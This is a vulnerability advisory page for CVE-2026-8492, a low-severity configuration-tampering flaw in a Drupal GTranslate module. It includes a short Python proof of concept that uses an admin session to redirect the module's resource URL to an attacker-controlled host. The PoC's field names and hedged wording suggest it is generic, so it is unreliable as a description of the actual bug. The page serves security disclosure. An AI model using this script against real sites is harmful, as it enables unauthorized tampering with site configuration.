Security Vulnerability Report
中文
CVE-2026-8492 CVSS 2.7 LOW

CVE-2026-8492

Published: 2026-05-19 23:16:59
Last Modified: 2026-05-20 18:16:28

Description

Modification of Assumed-Immutable Data (MAID) vulnerability in Drupal Translate Drupal with GTranslate allows Resource Location Spoofing. This issue affects Translate Drupal with GTranslate: from 0.0.0 before 3.0.5.

CVSS Details

CVSS Score
2.7
Severity
LOW
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:N/I:L/A:N

Configurations (Affected Products)

No configuration data available.

Translate Drupal with GTranslate < 3.0.5

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
# Proof of Concept for CVE-2026-8492 # This script demonstrates how a high-privileged user might # modify the immutable data to spoof the resource location. import requests target_url = "http://example.com/admin/config/regional/gtranslate/settings" # Malicious resource location to spoof the legitimate service malicious_url = "http://attacker-controlled-site.com/fake-resource" # Payload attempting to modify the assumed-immutable configuration payload = { "gtranslate_api_key": "", "gtranslate_resource_url": malicious_url, "form_id": "gtranslate_admin_settings", "op": "Save configuration" } # Attacker needs to be authenticated with high privileges (PR:H) cookies = { "SESSa1b2c3d4": "valid_admin_session_id_here" } headers = { "User-Agent": "Mozilla/5.0", "Content-Type": "application/x-www-form-urlencoded" } try: response = requests.post(target_url, data=payload, cookies=cookies, headers=headers) if response.status_code == 200 and "Configuration saved" in response.text: print("[+] Success: Configuration potentially modified.") print(f"[+] Resource location spoofed to: {malicious_url}") else: print("[-] Failed to modify configuration or invalid response.") except Exception as e: print(f"Error: {e}")

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2026-8492", "sourceIdentifier": "[email protected]", "published": "2026-05-19T23:16:58.860", "lastModified": "2026-05-20T18:16:28.137", "vulnStatus": "Undergoing Analysis", "cveTags": [], "descriptions": [{"lang": "en", "value": "Modification of Assumed-Immutable Data (MAID) vulnerability in Drupal Translate Drupal with GTranslate allows Resource Location Spoofing.\n\nThis issue affects Translate Drupal with GTranslate: from 0.0.0 before 3.0.5."}], "metrics": {"cvssMetricV31": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:N/I:L/A:N", "baseScore": 2.7, "baseSeverity": "LOW", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "HIGH", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 1.2, "impactScore": 1.4}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-471"}]}], "references": [{"url": "https://www.drupal.org/sa-contrib-2026-035", "source": "[email protected]"}]}}